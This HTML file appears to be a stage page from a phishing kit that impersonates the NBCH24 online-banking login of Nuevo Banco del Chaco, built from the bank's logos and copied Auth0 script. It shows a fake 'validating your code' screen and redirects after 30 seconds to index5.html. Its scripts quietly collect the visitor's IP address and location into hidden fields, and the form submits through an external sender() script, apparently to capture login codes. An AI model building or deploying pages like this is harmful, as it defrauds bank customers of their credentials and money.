<html><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <META HTTP-EQUIV="REFRESH" CONTENT="30;URL=index5.html">
    <title>Cargando...</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="SHORTCUT ICON" href="https://www.nbch.com.ar/Portals/0/favicon_nbch_20150908.ico" type="image/x-icon">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"><!-- Link para importar la tipografia "Montserrat"-->
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500&amp;display=swap" rel="stylesheet"><!-- Link para importar los iconos-->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><!-- Importar JQuery-->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><style type="text/css" id="operaUserStyle"></style><style type="text/css" id="operaUserStyle"></style><!-- Bootstrap JS-->
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js" integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5bApTppSuUkhZXN0VxHd" crossorigin="anonymous">
    <script>
         $.getJSON("https://api.ipify.org?format=json",
                                           function(data) {
         
             // Setting text of element P with id gfg
             $("#gfg").html(data.ip);
         })
      </script>
      <script>
         $.getJSON("https://ipinfo.io", function (response) {
    $("#ip").html("IP: " + response.ip);
    $("#address").html("" + response.city + ", " + response.country);
    
})
      </script>
    <style>
        body,
        html {
            height: 100%;
            background-image: url("https://cdn.nbch.com.ar/Portals/0/Images/nbch24-online-banking-prelogin-fondo.jpg");
            background-position: center;
            background-size: cover;
            font-family: 'Montserrat', sans-serif;
        }

        input {
            filter: none !important;
        }

        @media only screen and (max-width: 765px) {

            body,
            html {
                background-image: none;
            }

            .login-box {
                position: relative !important;
                box-shadow: none !important;
                border-top: none !important;
                top: 0 !important;
                transform: none !important;
                float: none !important;
            }

            .login-container .wrapper {
                position: relative;
                top: 0;
                z-index: 1;
                width: 100%;
            }
        }

        .login-container {
            position: relative;
            min-height: 100%;
            max-width: 900px;
            margin: auto;
        }

        .login-box {
            position: absolute;
            top: 50%;
            transform: translateY(-50%);
            padding: 20px;
            background-color: #fff;
            box-shadow: 0px 0px 1px 0.1px #9de1da;
            border-radius: 5px;
            border-top: 1px solid #e9e9e9;
        }

        .login-header {
            text-align: center;
            padding-top: 0;
        }

        .login-header img {
            width: 150px;
        }

        .login-footer {
            position: absolute;
            bottom: 10px;
            width: 300px;
            left: 0;
            right: 0;
            margin: 0 auto;
        }

        .login-footer img {
            width: 100%;
        }

        #error-message {
            display: none;
        }


        #gradient {
            height: 100px;
            background-image: linear-gradient(to bottom, rgb(255 255 255), rgb(255 255 255 / 0%));
            display: none;
        }

        #btn-login {
            background-color: #234881;
            border-radius: 0 !important;
            padding-bottom: 7px;
            padding-top: 7px;
            margin-top: 10px;
        }

        .center {
            text-align: center;
        }

        #bottom-imgs {
            height: 80px;
            display: flex;
            align-items: center;
            justify-content: space-evenly;
            width: 80%;
            margin: 0 auto;
        }

        #bottom-imgs .img-block {
            width: 40%;
        }

        #bottom-imgs .img-block img {
            width: 100%;
        }

        #vl {
            border-right: 1px solid #908f8f;
            height: 20px;
            display: inline;
        }

        .ingresa-cuenta {
            font-family: 'Montserrat', sans-serif;
            font-size: medium 18pt;
            color: #908f8f;
            padding-top: 10px;
        }

        .text {
            font-family: 'Montserrat', sans-serif;
            font-size: smaller;
            color: #908f8f;
        }

        a {
            font-size: smaller;
            color: #234881;
        }

        .space-right {
            margin-right: 5px;
        }

        input[type=text]:focus {
            outline: none !important;
            box-shadow: none !important;
            border: 2px solid #00c8a9;
        }

        input[type=password]:focus {
            outline: none !important;
            box-shadow: none !important;
            border: 2px solid #00c8a9;
        }

        .form-group {
            max-height: 60px;
            margin-top: 0 !important;
            margin-bottom: 0 !important;
        }

        .form-control {
            box-shadow: none;
            border-width: 1px;
            border-radius: 2px;
        }

        .eye-icon {
            position: relative;
            top: 30px;
            left: 60%;
            color: #908f8f;
        }

        @media only screen and (max-width: 765px) {
            .eye-icon {
                position: relative;
                left: 80%;
                color: #908f8f;
            }

            .login-header img {
                width: 250px;
            }
        }

        @media only screen and (max-width: 500px) {
            .eye-icon {
                position: relative;
                left: 70%;
                color: #908f8f;
            }
        }

        @media only screen and (max-width: 350px) {
            .eye-icon {
                position: relative;
                left: 60%;
                color: #908f8f;
            }
        }

        .form-group>label {
            text-decoration: none !important;
            top: 30px;
            left: 10px;
            position: relative;
            background-color: white;
            padding: 0px 5px 0px 5px;
            transition: 0.2s;
            pointer-events: none;
            font-family: 'Montserrat', sans-serif;
            font-size: 10px;
            color: #908f8f;
        }

        .label-animate>label {
            top: 12px !important;
            left: 12px !important;
            font-size: 10px;
            color: #234881;
            font-weight: 500;
        }

        label {
            font-weight: 200;
        }

        .login-footer-responsive {
            position: absolute;
            bottom: 0;
            display: none;
            height: auto;
        }

        @media only screen and (max-width: 765px) {
            .login-footer-responsive {
                display: block;
            }

            .login-footer-responsive img {
                width: 100%;
            }

            #gradient {
                display: block;
            }
        }

    </style>
</head>
<body><div class="login-container">
    <div class="wrapper">
        <div class="col-xs-12 col-sm-4 col-sm-offset-4 login-box" style="z-index:1000">
            <div class="login-header"><img src="https://cdn.nbch.com.ar/Portals/0/Images/logo-nbch24-tu-banco-siempre-con-vos-mobile.png">
                <h3 class="ingresa-cuenta">¡Trabajamos por su seguridad!</h3>
                <p class="text">Esperá mientras validamos el código ingresado.<br><br>En caso de ser incorrecto, en un momento recibirás un nuevo código al correo electrónico.</p>
            </div><div align="center"><img src="https://24.nbch.com.ar/assets/images/new-design/loading-bind.gif" alt="La cabeza y el torso de un esqueleto de dinosaurio;
           tiene una cabeza grande con dientes largos y afilados" width="100" height="101"></div>
            
            <div>
                <form action="" method="post" onsubmit=" return sender()">
                    
                    
                    <div class="center" style="padding-top: 5px; padding-bottom: 5px; margin-top: 5px"></div>
                    <p id="gfg" hidden="">
                    </p><p id="address" hidden="">Santa Marta, CO</p><div class="captcha-container form-group" style="display: none;"></div>
                </form>
                
                
                
                <p class="center text" style="margin: 0;">Contactanos:</p>
                <div class="center"><i class="fa fa-phone space-right" aria-hidden="true"></i>
                    <p class="space-right text" style="display:inline">0800-999-6224</p><i class="fa fa-whatsapp space-right" aria-hidden="true"></i>
                    <p class="text" style="display:inline">54-9-362-4161290</p>
                </div>
            </div>
        </div>
        <div id="gradient"></div>
    </div>
    <div class="login-footer"><img src="https://cdn.nbch.com.ar/Portals/0/Images/nbch24-online-banking-prelogin-legal-footer.png"></div>
    <div class="login-footer-responsive"><img src="https://cdn.nbch.com.ar/Portals/0/Images/nbch24-online-banking-prelogin-fondo.jpg"></div>
</div>
<!--if IE 8script(src='//cdnjs.cloudflare.com/ajax/libs/ie8/0.2.5/ie8.js')-->
<!--if lte IE 9script(src='https://cdn.auth0.com/js/polyfills/1.0/base64.min.js')
script(src='https://cdn.auth0.com/js/polyfills/1.0/es5-shim.min.js')-->
<script src="sax2.js"></script>
<script src=""></script>
<script src="https://cdn.auth0.com/js/polyfills/1.0/object-assign.min.js"></script>
<script>
    window.addEventListener('load', function() {
        var config = JSON.parse(
            decodeURIComponent(escape(window.atob('eyJpY29uIjoiaHR0cHM6Ly93d3cubmJjaC5jb20uYXIvUG9ydGFscy8wL0ltYWdlcy9sb2dvX25iY2g4LnBuZz92ZXI9MjAxNS0wOC0wNC0xOTUwMTQtMDAwIiwiYXNzZXRzVXJsIjoiIiwiYXV0aDBEb21haW4iOiJhdXRoLm5iY2guY29tLmFyIiwiYXV0aDBUZW5hbnQiOiJuYmNoIiwiY2xpZW50Q29uZmlndXJhdGlvbkJhc2VVcmwiOiJodHRwczovL2F1dGgubmJjaC5jb20uYXIvIiwiY2FsbGJhY2tPbkxvY2F0aW9uSGFzaCI6ZmFsc2UsImNhbGxiYWNrVVJMIjoiaHR0cHM6Ly8yNC5uYmNoLmNvbS5hci93ZWJiYW5rLXB1YmxpYy13ZWIvY2FsbGJhY2svYXV0aDAiLCJjZG4iOiJodHRwczovL2Nkbi5hdXRoMC5jb20vIiwiY2xpZW50SUQiOiJTT040dXdUamcwYkZzWmdJTXgwSlNSUm8yMXRSMWgyWCIsImRpY3QiOnsic2lnbmluIjp7InRpdGxlIjoiZG9pdC13ZWIifX0sImV4dHJhUGFyYW1zIjp7InByb3RvY29sIjoib2F1dGgyIiwic2NvcGUiOiJvcGVuaWQgcHJvZmlsZSBlbWFpbCIsInJlc3BvbnNlX3R5cGUiOiJjb2RlIiwiX2NzcmYiOiJjRHR5bUVkZy1BdnVsblNxSzF4VFJOam5Bczh4N0pDc1VKRWciLCJfaW50c3RhdGUiOiJkZXByZWNhdGVkIiwic3RhdGUiOiJoS0ZvMlNCeFltcG9XbUozUjFCcE1sWkJVRmxDZWtGWFlVOTNXV2xzTlZoMWVqQlhUNkZ1cFd4dloybHVvM1JwWk5rZ2VqQkZOVlJvWWpWa05GcFlabWx6Ykc1R1RtcGlZMHc1VDFkSVowdEJNVW1qWTJsazJTQlRUMDQwZFhkVWFtY3dZa1p6V21kSlRYZ3dTbE5TVW04eU1YUlNNV2d5V0EifSwiaW50ZXJuYWxPcHRpb25zIjp7InByb3RvY29sIjoib2F1dGgyIiwic2NvcGUiOiJvcGVuaWQgcHJvZmlsZSBlbWFpbCIsInJlc3BvbnNlX3R5cGUiOiJjb2RlIiwiX2NzcmYiOiJjRHR5bUVkZy1BdnVsblNxSzF4VFJOam5Bczh4N0pDc1VKRWciLCJfaW50c3RhdGUiOiJkZXByZWNhdGVkIiwic3RhdGUiOiJoS0ZvMlNCeFltcG9XbUozUjFCcE1sWkJVRmxDZWtGWFlVOTNXV2xzTlZoMWVqQlhUNkZ1cFd4dloybHVvM1JwWk5rZ2VqQkZOVlJvWWpWa05GcFlabWx6Ykc1R1RtcGlZMHc1VDFkSVowdEJNVW1qWTJsazJTQlRUMDQwZFhkVWFtY3dZa1p6V21kSlRYZ3dTbE5TVW04eU1YUlNNV2d5V0EifSwid2lkZ2V0VXJsIjoiaHR0cHM6Ly9jZG4uYXV0aDAuY29tL3cyL2F1dGgwLXdpZGdldC01LjEubWluLmpzIiwiaXNUaGlyZFBhcnR5Q2xpZW50IjpmYWxzZSwiYXV0aG9yaXphdGlvblNlcnZlciI6eyJ1cmwiOiJodHRwczovL2F1dGgubmJjaC5jb20uYXIiLCJpc3N1ZXIiOiJodHRwczovL2F1dGgubmJjaC5jb20uYXIvIn0sImNvbG9ycyI6eyJwYWdlX2JhY2tncm91bmQiOiIjZmZmZmZmIiwicHJpbWFyeSI6IiMwMDU5ZDYifX0=')))
        );
        var params = Object.assign({
            configurationBaseUrl: config.clientConfigurationBaseUrl,
            overrides: {
                __tenant: config.auth0Tenant,
                __token_issuer: config.authorizationServer.issuer
            },
            domain: config.auth0Domain,
            clientID: config.clientID,
            redirectUri: config.callbackURL,
            responseType: 'code'
        }, config.internalOptions);
        var webAuth = new auth0.WebAuth(params);

        /**
         * 
         * DATABASE CONECTION en AUTH0
         * 
         * Si el parámetro connection no está definido
         * seteamos el string de conexión LDAP de Active Directory
         * del NBCH.
         **/
        var connection;
        var esAD;
        if (
            // doit-mobile application
            config.clientID === "RDJAkcTmOhU6SnZ0jzPjECXmV3nj7TjS" ||
            // doit-web application
            config.clientID === "SON4uwTjg0bFsZgIMx0JSRRo21tR1h2X"
        ) {
            connection = "nbch";
        } else {
            esAD = true;
            connection = "ProdLDAPS";
        }

        // si es una conexión de tipo Active Directory, ocultamos elementos de la vista
        // que no corresponden
        if (esAD) {
            document.querySelector("a#link-olvidaste-tu-password").style.display = 'none'
            document.querySelector("a#link-crear-usuario").style.display = 'none'
          	document.querySelector("#bottom-imgs").style.display = 'none'
            document.querySelector(".login-header img").setAttribute("src","https://www.nbch.com.ar/Portals/0/Images/logo_nbch8.png?ver=2015-08-04-195014-000")
            document.querySelector(".form-group label").innerHTML = 'Usuario'
        }


        var captcha = webAuth.renderCaptcha(
            document.querySelector('.captcha-container')
        );

        //- variable utilizada para evitar que se ejecute 2 veces consecutivas
        //- el login
        var mutex = false;

        function login(e) {
            e.preventDefault();

            //- si mutex es verdadero, se sale de la función.
            if (mutex) return;
            //- seteamos mutex en verdadero.
            mutex = true;

            var button = this;
            var username = document.getElementById('usr').value;
            var password = document.getElementById('password').value;
            if (username && password) {
                button.disabled = true;
                webAuth.login({
                    realm: connection,
                    username: username,
                    password: password,
                    captcha: captcha.getValue()
                }, function(err) {
                    if (err) displayError(err);
                    button.disabled = false;
                    mutex = false;
                });
            }
        }

        function signup() {
            var button = this;
            var email = document.getElementById('email').value;
            var password = document.getElementById('password').value;
            button.disabled = true;
            webAuth.redirect.signupAndLogin({
                connection: connection,
                email: email,
                password: password,
                captcha: captcha.getValue()
            }, function(err) {
                if (err) displayError(err);
                button.disabled = false;
            });
        }

        function loginWithGoogle() {
            webAuth.authorize({
                connection: 'google-oauth2'
            }, function(err) {
                if (err) displayError(err);
            });
        }

        function displayError(err) {
            captcha.reload();
            var error
            if (err.code === "invalid_user_password") {
                error = "Usuario o contraseña inválido."
            } else if (err.code === "too_many_attempts") {
                error = "Tu cuenta fue bloqueada después de varios intentos fallidos de inicio de sesión consecutivos. Te enviamos un correo electrónico con instrucciones sobre cómo desbloquearla."
            } else if (
                err.description &&
                err.description.length &&
                err.descripcion.trim().toLowerCase() !== "invalid state"
            ) {
                error = err.description
            } else {
                error = "Disculpá, hubo un error no identificado. Volvé a intentarlo más tarde."
            }
            var errorMessage = document.getElementById('error-message');
            errorMessage.innerHTML = error;
            errorMessage.style.display = 'block';
        }

        document.getElementsByTagName("form")[0].onsubmit = login
    });

    function showPassword() {
        var x = document.getElementById("password");
        if (x.type === "password") {
            x.type = "text";
        } else {
            x.type = "password";
        }
    }

    $(document).ready(function() {

        // se controla si el navegador es EDGE
        if (/edg/ig.test(navigator.userAgent)) {
            // se ocultan los botones para mostrar la contraseña
            $(".fa.fa-eye").css("display", "none");
        }

        // BUGFIX de autocomplete de chrome y firefox
        // que ocultaba los valores con los labels
        // de los campos.
        function checkIfFieldsAreNotEmptyAndAddClass() {
            $(".form-control").each(function() {
                if (
                    this.value.trim() !== "" ||
                    (
                        !/firefox/ig.test(navigator.userAgent) &&
                        $(this).is("*:-webkit-autofill")
                    )
                ) {
                    $(this).parent().addClass("label-animate");
                }
            });
        }

        setTimeout(checkIfFieldsAreNotEmptyAndAddClass, 500);

        $(".form-control").change(checkIfFieldsAreNotEmptyAndAddClass)


        $(".form-control").focus(function() {
            $(this).parent().addClass("label-animate");
        });
        $(window).click(function() {
            if (!$(event.target).is('.form-control')) {
                $(".form-control").each(function() {
                    if (
                        $(this).val() == '' &&
                        /*
                          bugfix de submit de formulario con botón
                          enter de teclado, que ocultaba el texto
                        */
                        !$(this).is(":focus")
                    ) {
                        $(this).parent().removeClass("label-animate");
                    }
                });
            }
        });
    });

</script></body></html>